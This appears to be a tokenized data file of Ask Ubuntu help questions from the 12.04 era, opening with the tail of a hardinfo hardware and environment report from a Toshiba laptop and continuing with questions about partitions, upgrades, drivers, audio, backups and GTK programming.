drivers v2 v4l2_compat_ioctl32 snd advanced linux sound architecture driver for soundcards . cfg80211 wireless configuration support toshiba_acpi toshiba laptop acpi extras driver sparse_keymap generic support for sparse keymaps i915 intel graphics wmi acpi-wmi mapping driver mac_hid soundcore core sound module mei intel ( r ) management engine interface snd_page_alloc memory allocator for alsa system . drm_kms_helper drm kms helper drm drm shared core routines i2c_algo_bit i2c-bus bit-banging algorithm video acpi video driver lp parport sdhci_pci secure digital host controller interface pci driver atl1c atheros 1000m ethernet network driver sdhci secure digital host controller interface core driver display display resolution 1366x768 pixels vendor the x.org foundation version 1.11.3 monitors monitor 0 1366x768 pixels extensions big-requests composite damage double-buffer dpms dri2 glx generic event extension mit-screen-saver mit-shm randr record render security sgi-glx shape sync x-resource xc-misc xfixes xfree86-dga xfree86-vidmodeextension xinerama xinputextension xkeyboard xtest xvideo xvideo-motioncompensation opengl vendor unknown renderer unknown version unknown direct rendering no environment variables environment variables gnome_keyring_pid 1909 user newboldrob language en_ca : en compiz_config_profile ubuntu home /home/newboldrob desktop_session ubuntu xdg_session_cookie 498fb75b765154017de4d4f600000006-1337279911.793697-790372385 xdg_seat_path /org/freedesktop/displaymanager/seat0 gnome_keyring_control /tmp/keyring-mbktd5 ubuntu_menuproxy libappmenu.so mandatory_path /usr/share/gconf/ubuntu.mandatory.path logname newboldrob defaults_path /usr/share/gconf/ubuntu.default.path path /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games xdg_session_path /org/freedesktop/displaymanager/session0 display :0 lang en_ca.utf-8 xauthority /home/newboldrob/.xauthority shell /bin/bash gdmsession ubuntu pwd /home/newboldrob xdg_data_dirs /usr/share/ubuntu : /usr/share/gnome : /usr/local/share/ : /usr/share/ xdg_config_dirs /etc/xdg/xdg-ubuntu : /etc/xdg ssh_auth_sock /tmp/keyring-mbktd5/ssh ssh_agent_pid 1956 dbus_session_bus_address unix : abstract=/tmp/dbus-ljqiexwpfa , guid=ac9ec0861066e374d8f3adc9000001af gnome_desktop_session_id this-is-deprecated session_manager local/satellite-e305 : @ /tmp/.ice-unix/1920 , unix/satellite-e305 : /tmp/.ice-unix/1920 xdg_current_desktop unity gpg_agent_info /tmp/keyring-mbktd5/gpg:0:1 gio_launched_desktop_file /usr/share/applications/hardinfo.desktop gio_launched_desktop_file_pid 3780 devices processor processors intel ( r ) core ( tm ) i5-2410m cpu @ 2.30ghz 1800.00mhz intel ( r ) core ( tm ) i5-2410m cpu @ 2.30ghz 800.00mhz intel ( r ) core ( tm ) i5-2410m cpu @ 2.30ghz 2301.00mhz intel ( r ) core ( tm ) i5-2410m cpu @ 2.30ghz 800.00mhz memory memory total memory 6060628 kb free memory 3564244 kb buffers 59328 kb cached 897064 kb cached swap 0 kb active 1593872 kb inactive 677628 kb active ( anon ) 1316576 kb inactive ( anon ) 299292 kb active ( file ) 277296 kb inactive ( file ) 378336 kb unevictable 92 kb mlocked 92 kb virtual memory 6235132 kb free virtual memory 6235132 kb dirty 0 kb writeback 0 kb anonpages 1315308 kb mapped 170980 kb shmem 300700 kb slab 74044 kb sreclaimable 42344 kb sunreclaim 31700 kb kernelstack 3944 kb pagetables 43348 kb nfs_unstable 0 kb bounce 0 kb writebacktmp 0 kb commitlimit 9265444 kb committed_as 4603192 kb vmalloctotal 34359738367 kb vmallocused 564792 kb vmallocchunk 34359169728 kb hardwarecorrupted 0 kb anonhugepages 0 kb hugepages_total 0 hugepages_free 0 hugepages_rsvd 0 hugepages_surp 0 hugepagesize 2048 kb directmap4k 55296 kb directmap2m 6184960 kb pci devices pci devices host bridge intel corporation 2nd generation core processor family dram controller ( rev 09 ) vga compatible controller intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) communication controller intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) usb controller intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 04 ) ( prog-if 20 [ ehci ] ) audio device intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) pci bridge intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b4 ) ( prog-if 00 [ normal decode ] ) pci bridge intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b4 ) ( prog-if 00 [ normal decode ] ) pci bridge intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b4 ) ( prog-if 00 [ normal decode ] ) pci bridge intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b4 ) ( prog-if 00 [ normal decode ] ) pci bridge intel corporation 6 series/c200 series chipset family pci express root port 7 ( rev b4 ) ( prog-if 00 [ normal decode ] ) usb controller intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) isa bridge intel corporation hm65 express chipset family lpc controller ( rev 04 ) sata controller intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) smbus intel corporation 6 series/c200 series chipset family smbus controller ( rev 04 ) usb controller nec corporation upd720200 usb 3.0 host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) usb devices printers printers no printers found battery battery : bat1 state discharging ( load : 1253 ma ) capacity 3876 mah / 6000 mah ( 64.60 % ) battery technology rechargeable ( lion ) model number pa3921u-1brs serial number sensors input devices input devices power button lid switch power button at translated set 2 keyboard toshiba input device cnf9055 video bus synps/2 synaptics touchpad hda intel pch hdmi/dp , pcm 3= storage scsi disks ata seagate st950056 matshita dvd-ram uj8a0as generic- xd/sd/m.s . dmi bios date 02/10/2012 vendor insyde version 2.20 board name base board product name vendor intel corp. ( www.intel.com ) resources i/o ports 0000-0cf7 pci bus 0000:00 0000-001f dma1 0020-0021 pic1 0040-0043 timer0 0050-0053 timer1 0060-0060 keyboard 0062-0062 ec data 0064-0064 keyboard 0066-0066 ec cmd 0070-0077 rtc0 0080-008f dma page reg 00a0-00a1 pic2 00c0-00df dma2 00f0-00ff fpu 0400-0453 pnp 00:05 0400-0403 acpi pm1a_evt_blk 0404-0405 acpi pm1a_cnt_blk 0408-040b acpi pm_tmr 0410-0415 acpi cpu throttle 0420-042f acpi gpe0_blk 0450-0450 acpi pm2_cnt_blk 0454-0457 pnp 00:07 0458-047f pnp 00:05 0500-057f pnp 00:05 0680-069f pnp 00:05 0cf8-0cff pci conf1 0d00-ffff pci bus 0000:00 1004-1013 pnp 00:05 164e-164f pnp 00:05 2000-2fff pci bus 0000:0a 2000-207f atheros communications inc. ar8152 v2.0 fast ethernet ( rev c1 ) 2000-207f atheros 1000m ethernet network driver 3000-3fff pci bus 0000:03 4000-403f intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) 4040-405f intel corporation 6 series/c200 series chipset family smbus controller ( rev 04 ) 4060-407f intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) 4060-407f ahci 40a0-40a7 intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) 40a0-40a7 ahci 40c0-40c7 intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) 40c0-40c7 ahci 413c-413f intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) 413c-413f ahci 4154-4157 intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) 4154-4157 ahci ffff-ffff pnp 00:05 ffff-ffff pnp 00:05 memory 00000000-0000ffff reserved 00010000-0009d7ff system ram 0009d800-0009ffff reserved 000a0000-000bffff pci bus 0000:00 000c0000-000cefff video rom 000cf000-000cffff adapter rom 000e0000-000fffff reserved 000f0000-000fffff system rom 00100000-ace3efff system ram 01000000-016699ab kernel code 016699ac-01ce4fff kernel data 01dd3000-01f28fff kernel bss ace3f000-acebefff reserved acebf000-acfbefff acpi non-volatile storage acfbf000-acffefff acpi tables acfff000-acffffff system ram ad000000-af9fffff reserved afa00000-feafffff pci bus 0000:00 afa00000-afa00fff pnp 00:0a b0000000-bfffffff intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) c0000000-c03fffff intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) c0400000-c13fffff pci bus 0000:03 c1400000-c14fffff pci bus 0000:0a c1400000-c143ffff atheros communications inc. ar8152 v2.0 fast ethernet ( rev c1 ) c1400000-c143ffff atheros 1000m ethernet network driver c1500000-c15fffff pci bus 0000:09 c1500000-c1501fff intel corporation centrino wireless-n 1000 c1500000-c1501fff intel ( r ) wireless wifi link agn driver for linux c1600000-c25fffff pci bus 0000:03 c1600000-c16000ff realtek semiconductor co. , ltd. rts5116 pci express card reader ( rev 01 ) c1600000-c16000ff mmc0 c1601000-c1601fff realtek semiconductor co. , ltd. rts5116 pci express card reader ( rev 01 ) c1601000-c1601fff realtek pci-express card reader driver c2600000-c26fffff pci bus 0000:02 c2600000-c2601fff nec corporation upd720200 usb 3.0 host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) c2600000-c2601fff xhci_hcd c2700000-c2703fff intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) c2700000-c2703fff ich hd audio c2704000-c270400f intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) c2704000-c270400f intel ( r ) management engine interface c2706000-c27060ff intel corporation 6 series/c200 series chipset family smbus controller ( rev 04 ) c2708000-c27087ff intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) c2708000-c27087ff ahci c2709000-c27093ff intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) c2709000-c27093ff ehci_hcd c270a000-c270a3ff intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 04 ) ( prog-if 20 [ ehci ] ) c270a000-c270a3ff ehci_hcd e0000000-efffffff pci mmconfig 0000 [ bus 00-ff ] e0000000-efffffff reserved e0000000-efffffff pnp 00:0a feb00000-feb03fff reserved fec00000-fec00fff reserved fec00000-fec003ff ioapic 0 fed00000-fed003ff hpet 0 fed10000-fed19fff reserved fed10000-fed17fff pnp 00:0a fed18000-fed18fff pnp 00:0a fed19000-fed19fff pnp 00:0a fed1c000-fed1ffff reserved fed1c000-fed1ffff pnp 00:0a fed20000-fed3ffff pnp 00:0a fed90000-fed93fff pnp 00:0a fee00000-fee00fff local apic fee00000-fee00fff reserved ffd80000-ffffffff reserved 100000000-1cfdfffff system ram 1cfe00000-1cfffffff ram buffer dma 4 cascade network interfaces network interfaces lo 0.06mib 0.06mib 127.0.0.1 wlan0 3.85mib 1.30mib 192.168.0.2 eth0 0.00mib 0.00mib benchmarks cpu blowfish cpu blowfish this machine 1800 mhz 4.303 intel ( r ) celeron ( r ) m processor 1.50ghz ( null ) 26.1876862 powerpc 740/750 ( 280.00mhz ) ( null ) 172.816713 cpu cryptohash cpu cryptohash this machine 1800 mhz 327.916 cpu fibonacci cpu fibonacci this machine 1800 mhz 1.874 intel ( r ) celeron ( r ) m processor 1.50ghz ( null ) 8.1375674 powerpc 740/750 ( 280.00mhz ) ( null ) 58.07682 cpu n-queens cpu n-queens this machine 1800 mhz 5.493 fpu fft fpu fft this machine 1800 mhz 1.092 fpu raytracing fpu raytracing this machine 1800 mhz 3.930 intel ( r ) celeron ( r ) m processor 1.50ghz ( null ) 40.8816714 powerpc 740/750 ( 280.00mhz ) ( null ) 161.312647
138234	how to remove one windows partition to install ubuntu , but keep other partitions on drive	i 'm using windows 7 currently and would like to switch it just to ubuntu 12.04 thus removing windows 7 completely . however , i 'd like to keep the data stored in other partitions . i have 4 partitions on the hard drive , namely c , d , e and f at the moment with windows 7 installed on c : . i would like to retain the data from all the other 3 partitions in ubuntu . can anyone please tell me what steps i need to take in order to achieve this . thanks .
138235	black screen problem after setting ubuntu 12.4	i having problem with ubuntu 12.4.i am using win 7 , i set up it and after that i open my computer , it does n't work , all is black screen and nothing else . i put my win 7 cd to set up again and i have been waiting to see what 's going on with my laptop ? have n't any result . could you help me to solve this problem ? i am really need to fix because i used my laptop for studying .
138241	how to integrate gmail , google contacts and google calendar into unity without thunderbird or evolution ?	i want to integrate my google contacts , calender and gmail to unity . and i donâ´t want to use thunderbird or even worse evolution . is there a possibility like in gnome 3.xx ? a lightweight contact / calendar / mail app ( maybe one app for contact , one for calendar ) would be welcome . edit : i want to use the calender to sync my appointments with google - e.g . i open my `` ubuntu-calender '' , make a new appointment and it syncs with google calendar . also return way . the same with contacts . i want a see and edit all my contacts in an app and have them sync with google . gmail : a notifyer would be enough - just one click on the notifyer and it opens googlemail in chrome . otherwise an lightweigth email client . kind regards mpm
138245	hp compaq nx5000 laptop freezes with 12.04 , which kernel parameter could fix it ?	i recovered an old laptop ( hp compaq nx5000 ) . it worked with ubuntu server 8.04 very good a lot years ago . i 'm trying install ubuntu desktop 12.04 & 10.04 , but the laptop freezes on the first 15 minutes . i reinstalled windows xp and the laptop works perfect , without freezes . i think is a kernel issue . i read this great documentation and this , but i 'm little lost with it . which parameter could be the issue ?
138250	how do i remove my ubuntu partition from windows 7 and reuse the space ?	i am dual-booting windows 7 and ubuntu , both installed on separate partitions . i do n't need ubuntu anymore . how can i remove the ubuntu partition ( s ) and add the reclaimed space to my windows 7 partition for saving files in windows ?
138253	how to connect to the internet using an airtel 3g usb dongle ?	i installed ubuntu 12.04 lts on an hp pavilion dv6 laptop alongside windows 7 . i am not able to connect to internet via airtel 3g usb dongle . i tried editing the network connection and am still unable to connect to internet . apart from that , while installing ubuntu certain firmware updates we needed and i skipped that step since i could n't connect to internet .
138259	upgrade from 11.10 to 12.04 seems stuck at `` preconfiguring packages ... . '' stage of installation	i 'm trying to do an upgrade from 11.10 to 12.04 , and getting stuck at the installing the upgrades phase , in preconfiguring package ... . the terminal reports the following : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 , < > line 1621 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 , < > line 1621 . extract templates from packages : 100 % preconfiguring packages ... it 's been stuck here for over 16 hours ! any suggestions ? i have at least 15gb free space so that is not the difficulty .
138263	brightness hotkeys only slightly work	i just installed precise on my samsung laptop ( qx412-s01au , using ubuntu 2d ) . the brightness hotkeys sort of work : adjusting the brightness using the slider in the control panel works just fine pressing the brightness keys brings up the brightness notification pressing `` up '' raises the brightness to maximum , no matter what it was before pressing `` down '' lowers the brightness to one step below maximum , no matter what it was before . another answer i looked ( ca n't find the link , sorry ) got my to try this : echo `` 0 '' | sudo tee /sys/devices/pci0000:00/0000:00:01.0/0000:01:00.0/backlight/acpi_video0/brightness which takes the brightness to the lowest setting . and echo `` 7 '' | sudo tee /sys/devices/pci0000:00/0000:00:01.0/0000:01:00.0/backlight/acpi_video0/brightness which takes the brightness to the highest setting . each step inbetween works too . between that and the control panel working , i think the drivers are fine . any idea why the hotkeys ( and only the hotkeys ) seem to get stuck on the top two brightness settings ? p.s . happy to hit up the command line to make it work : )
138265	ubuntu made my second hdd disappear from the bios !	my netbook , an asus 1015px , shipped with two harddrives . after switching to ubuntu , the second drive is n't recognized by the os or the bios . i 've never formatted the second drive , so it 's still set up for use by windows . i guess i do n't care about the data on the drive , i 'd just like to be able to use it again . it 's probably also worth mentioning that i 'm very new to any form of linux , so i 'm remarkably new to the terminal .
138266	distorted choppy audio in precise	after installing precise on my pc , some problems with sound occur . while using lucid there were no problems . the sound is choppy and distorted in the lower tones . as i have no experience in setting/testing and doing anything with audio devices , i need help even to diagnose the problem . update $ sudo lshw -c multimedia *-multimedia description : audio device product : radeon x1200 series audio controller vendor : hynix semiconductor ( hyundai electronics ) physical id : 5.2 bus info : pci @ 0000:01:05.2 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : driver=snd_hda_intel latency=32 resources : irq:19 memory : fdafc000-fdafffff *-multimedia description : audio device product : sbx00 azalia ( intel hda ) vendor : hynix semiconductor ( hyundai electronics ) physical id : 14.2 bus info : pci @ 0000:00:14.2 version : 00 width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : driver=snd_hda_intel latency=32 resources : irq:16 memory : fe024000-fe027fff update 2 it has something to do with the volume . if the audio is quiet it is not choppy , if the sound is loud then it begins to be choppy .
138270	can not enable firefox sync in 12.04	i have upgraded to 12.04 . i have noticed that firefox sync does not work again . when i have tried to set it up again , i came into the pop-up window , filled in all the required fields ( i am using the recovery key ) but when pressing next nothing happens .
138273	how to remove an icon from unity dash ?	i installed dbvisualize in ubuntu 12.04 . now i do n't want to use it anymore , so i deleted the folder `` dbvisualizer '' in my home folder . problem is i can still see the icon in the dash . how could i remove it completely from my system ( for other apps too ) ?
138282	how to enable shutdown sound on ubuntu 12.04	i need a sound to play when i shutdown . in kubuntu , there 's shutdown sound . but ubuntu , not anymore
138283	how do i install cacti 8.7i with pia 3.1 ( plug in architecture ) for 12.04 server lts ?	i am planning to upgrade my current 9.04 server version to 12.04lts server . i 've successfully backup and restore my cacti version 8.7d to 8.7i that comes with the distribution . however , the plugin patch installation for pia 3.1 it is not working for only ubuntu . can you assist ? or it 's there a way to include cacti 8.8a which is a stable version which comes with pia 3.1 preinstalled . regards , thomas
138284	how to downgrade a package via apt-get ?	how to downgrade a package to an older version via apt-get ? ! another tools are also accepted but apt-get is preferred .
138290	installation problem ubuntu 12.04 with hp pavilion dv4 3006tx laptop	i am trying to install ubuntu 12.04 in my laptop containing model is hp pavilion dv4 3006 tx , it has 1gb graphics card ( video graphics amd radeon hd 6750m ( 1 gb ddr5 ) ) . installation process is taken by my laptop but there are problem when rebooting it . when i want to open ubuntu as my operating system it does't open , my laptop display turn off . more info about my pc configuration pls visit : http : //h20000.www2.hp.com/bizsupport/techsupport/document.jsp ? lang=en & cc=us & objectid=c02780984 & jumpid=reg_r1002_usen # a1 collapse this comment
138295	the best backup tool ?	i use ubuntu 11.10 and i was wondering which backup tool is the best at the moment . i do not need some lightweight , but a very robust and powerful tool like i find on windows platforms . i need to back files periodically to my external hd . previously i got an excellent advises here on which app to use for a specific task , so i hope you 'll propose another great tool for backup . thanks
138297	how can i set up aptitude-curses so that it does n't automatically select *recommended* packages ?	when i select a package for installation using aptitude-curses , sometimes a huge list of extra packages appear selected under `` packages being automatically installed to satisfy dependencies '' . when i go through this list i see that some packages are there only because the one i was installing in the first place recommends it . is there a way that i can set up aptitude so that these packages are not marked for installation , but instead appear in some sort of list like the `` packages which are suggested by other packages '' already do ?
138300	how to start ubuntu from wubi	i 'm having a hard time in turning on the ubuntu ! when i open it , it shows me that i must use some wubi program and when i do . it give me 2 options demo and full installation learn more and when i choose option 1 it give me 3 more options : reboot now i want to manually reboot later help me to boot from cd finish and when i finish ubuntu closes . can some one tell me another way of turning on this program .
138317	is it possible to minimize by mouse click ?	is it possible to minimize or close any application or browser by mouse click . if i click any icon on launcher then the application opens but if i click on the same icon then it does not get close or minimize . i need to go to the minimize or close button for the same . please let me know .
138319	how to install keryx ?	how to install keryx in ubuntu 12.04 ? knowing that keryx1.0 needs python < 2.7 and ubuntu 12.04 has python2.7.3 so what could i do either to downgrade python or installing keryx bas some way . also any suggestions replacing keryx for offline repositories are also very welcomed
138323	mouse stops functioning after upgrade ubuntu 11.10 > > 12.04	after the upgrade everything works fine , but after a while the mouse cursor is moving but i can not work wirh right- or leftclick , neither the keyboard . i work with logitech ex100 wireless mouse and keyboard and had no problems whatsoever in 11.10 thanks voor reply kind regards john
138333	unity and firefox are running slow	just installed ubuntu 12.04 on my laptop . all the applications are running quite slow , so is unity and the web browser . for example hd quality youtube videos are lagging and scrolling down pages lags . my specs : ubuntu 12.04 8 gb ddr2 800 mhz ram intel core 2 duo 2.0ghz 750 gb hdd
138334	how do i get this mac os x exposăš behavior ?	in mac os x , i can move all windows to the nearest corner by hitting f11 key . i 'm just wondering if there is a compiz plugin works like that . i know that there is scale plugin already . but all that i want is something like this . you 'll see , press a key and all windows fly off to nearest corner so i can drag/drop file or do something else on my desktop , then press the key again and all windows fly back .
138336	how to change the cursor to hourglass in a python gtk3 application	i 've a function taking quite a long time to perform and i 'm trying to change the cursor to an hour glass during the time the function is executed . but it only works the very first time the function is called . i 'm doing this ( it 's in an on_click event handler of a button ) : from gi.repository import gtk , gdk , gobject import time def on_grabbtn_clicked ( self , button ) : # change the cursor to hour glass cursor = gdk.cursor.new ( gdk.cursortype.watch ) self.window.get_root_window ( ) .set_cursor ( cursor ) # lenghty process here time.sleep ( 10 ) # set the cursor to normal arrow cursor = gdk.cursor.new ( gdk.cursortype.arrow ) self.window.get_root_window ( ) .set_cursor ( cursor ) window is a window build with glade/gtkbuilder and named ... window . i get a handle on it in the __init__ ( ) of the window class like this : self.window = self.builder.get_object ( 'window ' ) as i said , the hour glass appears only the first time i click on the button . the second time it does n't work anymore . so i 'm doing it wrong . but what am i doing wrong ?
138346	what 's the right way to make a backport recipe for bzr-builder ?	i maintain some packages in lp that i need to backport to oneiric , lucid and -- - even -- - hardy . for example , my trunk branch builds correctly to precise and quantal , and i want to create a separate lucid-backport branch ( not necessarily a fork of trunk ) which only contains the modified debian/control and debian/compat files needed for the backport to lucid . then i like to write a bzr-builder recipe to combine both branches someway . what 's the right way to do this ?
138353	ubuntu 11.10 and 12.04 - my computer gui - list of hard drives - `` unknown type ''	please see attached image . i have no idea why it is being listed lik3 that . i have no problems with accessing the file system or any other problems . any ideas ?
138356	how do i get a live-usb to use a partition for persistence ?	i want to install ubuntu to a usb hard drive so that it will run on all systems , that can run the livecd and store persistent data on a regular ext4 partition rather than a casper-rw file . in every other way it should behave like a regular ubuntu installation . the problem with startup disk creator one is able to put the livecd image on a usb-device . changes can be made persistent but are stored in a file that is limited to a few gb in size . said persistent file ( additionally to being size restricted ) has the problem that it is n't readable like data on a normal partition . * my question so how do i get the livecd on a usb disk in such a way that the changes are stored in a normal partition rather than a persistence file ? also the persistent changes should n't be restricted to a few gb in size but use whole partition of many 100 gb if need be . i suspect there is a tutorial out there for this , but my google-fu is just not good enough to find it . tl ; dr : sytem should run on all hardware configurations , have full functionality of the livecd and be stored on a regular ext4 partiton without using ramdisks and casper-rw . fu casper-rw . *i know one could mount the casper-rw file from another os and get to the data this way but that 's a hassle .
138366	how to remove the openbox menu items from my login-screen resulted due to lxde installation	installed the lxde desktop environment from ubuntu software center in my 12.04 lts version ... the lxde installation is successful , but it shows two more menu items in the login prompt , gnome/openbox and openbox.. both menu does n't function properly and acts as dummy items . so how can i remove those menu entries from the login prompt . thanks..
138367	12.04 rebooting after suspend to disk	i 've got a problem with suspend to disk in ubuntu 12.04 ( it worked perfectly in 11.10 ) . i 've installed the pm-utils package , but whenever i issue : sudo pm-hibernate it appears the screen that notifies me that the s2disk image is being created ( and it is ) , the system powers down , and then it powers up again , taking me back to where i was ... what can i do to prevent the system from rebooting ? i 've tried to modify many options in the bios ( s1 , s3 , no reboot after failure etc ) thanks
138371	lock up when running spiral knights	i 'm running ubuntu 12.04 i installed steam through windows 1.4 and that works fine . i also installed spiral knights through steam . wine hq says that it runs properly , but when i run it the screen goes black . when i press the prt sc button it makes te camera sound and changing the volume buttons work , but the only way to get my screen back is to shut down with the power button . is there anyway to fix this problem and be able to play spiral knights ?
138373	ubuntu 11.10 dhclient-enter-hook.d scripts not invoked	i have a box with ubuntu 11.10 installed . and the box was configured to get ip and hostname from dhcp . we have set to scripts in /etc/dhcp/dhclient-enter-hooks.d/ folder . but these scripts were not invoked/executed . i have similar scripts in another box , which has ubuntu 10.04 installed and hook scripts executes without issues . one difference is that in the 11.10 box has networkmanager installed . # ps -ef | grep dhclient root 746 695 0 03:52 ? 00:00:00 /sbin/dhclient -d -4 -sf /usr/lib/networkmanager/nm-dhcp-client.action -pf /var/run/dhclient-eth0.pid -lf /var/lib/dhcp/dhclient-559273da-a027-458e-b124-bdbb4976ee17-eth0.lease -cf /var/run/nm-dhclient-eth0.conf eth0 how did i test that the script in /etc/dhcp/dhclient-enter-hooks.d was not running ? i have placed a simple script `` mytest '' which has below code in /etc/dhcp/dhclient-enter-hooks.d . the file /tmp/enter-hook.out was never generated . # ! /bin/sh echo `` this is test file to test dhclient-enter-hook '' > /tmp/enter-hook.out snip of my /etc/network/interfaces # cat /etc/network/interfaces auto lo iface lo inet loopback auto eth0 inet dhcp
138374	internal gzip read error	i have a dell optiplex 755 core 2 duo that i made a fresh install of 12.04 . there is no winows os on the machine . it has been running mostly fine for over a week . i do keep getting system crashes due to an xserver-xorg-intel conflict , but at least i know the source of that . recently , running upgrade & & update i keep getting a conflict , seemingly with just one update , the most recent linux-libc-dev . here 's what i get : jay @ jay-jay : / $ sudo apt-get upgrade & & sudo apt-get update reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : linux-libc-dev 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/828 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 208582 files and directories currently installed . ) preparing to replace linux-libc-dev 3.2.0-23.36 ( using ... /linux-libc-dev_3.2.0-24.37_i386.deb ) ... unpacking replacement linux-libc-dev ... dpkg-deb ( subprocess ) : data : internal gzip read error : ' : data error' dpkg-deb : error : subprocess returned error exit status 2 dpkg : error processing /var/cache/apt/archives/linux-libc-dev_3.2.0-24.37_i386.deb ( -- unpack ) : subprocess dpkg-deb -- fsys-tarfile returned error exit status 2 no apport report written because the error message indicates an issue on the local system errors were encountered while processing : /var/cache/apt/archives/linux-libc-dev_3.2.0-24.37_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have searched askubuntu , have found similar questions and have tried the accepted answers where i thought they may have been of use . at this point , i am stalled .
138376	how can i make kde faster in ubuntu 12.04 . it 's very slow	i installed the kubuntu-desktop package in ubuntu 12.04 lts , but the problem is kde responses very slowly . if i click on an application 's icon to run it , it appears after 10 seconds and sometimes does not appear at all . it hangs all the time . the cursor is almost impossible to follow because of the lag . i have read on the internet that unity uses more memory and cpu than kde . but on my pc unity runs smoothly and kde does not . so what should i do to make kde as fast , responsive and smooth as unity ? my specifications are as follows : ram : 1.5 gb ( ddr2 ) processor : 3 ghz dual core graphics card : intel hd graphics with 256 mb memory .
138377	where can i find the dns cache ?	i just want to see how ip addresses mapped to domain names in my local machine . is it possible ? thanks . btw , it 's just for fun .
138378	how to highlight buttons in a gtk toolbar	i 've written an application using python and glade . the app has got a toolbar with a dark background , and each toolbar button has got a custom image ( i.e . no stock icons are used ) . i 've noticed that when using stock icons instead of custom images as icons , whenever the mouse hovers over the button the button is highlighted , which does not happen with my custom images . thunderbird seems to go a step further and rather than highlighting the icons , it inverts their color , which works quite well for a dark theme ( see below ) : button not highlighted , normal color button highlighted on hover , color inverted how can i get my custom icon images or the buttons to be highlighted on hover ?
138379	formatted usb drive , not detecting ... repairable ?	i formatted my pendrive with ext2 filesystem in ubuntu.now its not detecting in ubuntu and windows . here 's what the disk utility says . model : generic usb mass stoarge firmware version : 1.00 location : - write cache : - capacity : no media detected partitoning : - serial number : world wide name : - device : /dev/sdb rotation rate : - connection : usb at 480.0 mb/s smart status : not supported options ... format drive -- safe removal volumes : - usage : - device : partition type : - capacity : - then click on format drive and try to format with every option , its showing some error like : error creating partition table : helper exited with exit code 1 : can not open /dev/sdb : no medium found then i tried gparted to format usb drive , but it is not detecting . how can i repair these usb drive ? result of following commands : $ sudo cfdisk /dev/sdb fatal error : can not open disk drive press any key to exit cfdisk $ sudo mkfs.ext2 /dev/sdb mke2fs 1.41.14 ( 22-dec-2010 ) /dev/sdb is entire device , not just one partition ! proceed anyway ? ( y , n ) y mkfs.ext2 : no medium found while trying to determine filesystem size $ sudo mkfs.vfat /dev/sdb mkfs.vfat 3.0.9 ( 31 jan 2010 ) /dev/sdb : no medium found
138385	ca n't boot into ubuntu . have windows installed on one hd an ubuntu on the other	i decided to put ubuntu on my old pc that is running windows xp , i found an old hd laying around , formatted it and installed ubuntu . i wanted to make them separate so i installed in completely separate on the `` new '' hd . now when i turn on the computer it goes straight to windows . how do i get the choice to boot into ubuntu ?
138386	the brightness gets reset after unlocking	i 'm getting this annoying behaviour ( did n't occur on any of the previous releases ) , every time the display gets lock after typing the password the brightness is reset to 100 % . but when i open the `` brightness & lock '' the brightness level is restored ... does anyone have a similar behaviour ? using ubuntu 12.04 with unity ( i915 ) on a asus n55sf . thanks in advance
138389	no background in second screen ( separate x screen )	after upgrading to 12.04 gnome classic amd64 , the second screen is pure white . when launching the wallpaper shows up for a second then goes away . also , the panels are empty .
138393	when starting or log off/on , add'l panels show and some panel applets are duplicated	after upgrading to 12.04 gnome classic amd64 , every time i log on a new additional blank panel appears on the top and bottom panels - which i delete every time . in addition , the default panel applets are duplicated in the original panels . also the panels in the second screen are empty ( in addition to the wallpaper being hidden ) . update : as suggested by fossfreedomm i created a new user and the same behavior occurred . i increased the height of the panels ( 24 > 36 ) and the added panels did not change . if i do n't remove the added panels and log off/on i get still another - they accumulate . if i switch user instead of logoff/logon , the add'l panel do not appear .
138394	why is the enable wireless button greyed out and unselectable ?	the 'enable wireless ' button on the top right is greyed out and i am unable to click it and my wireless wo n't work anymore . what can i do to fix this ?
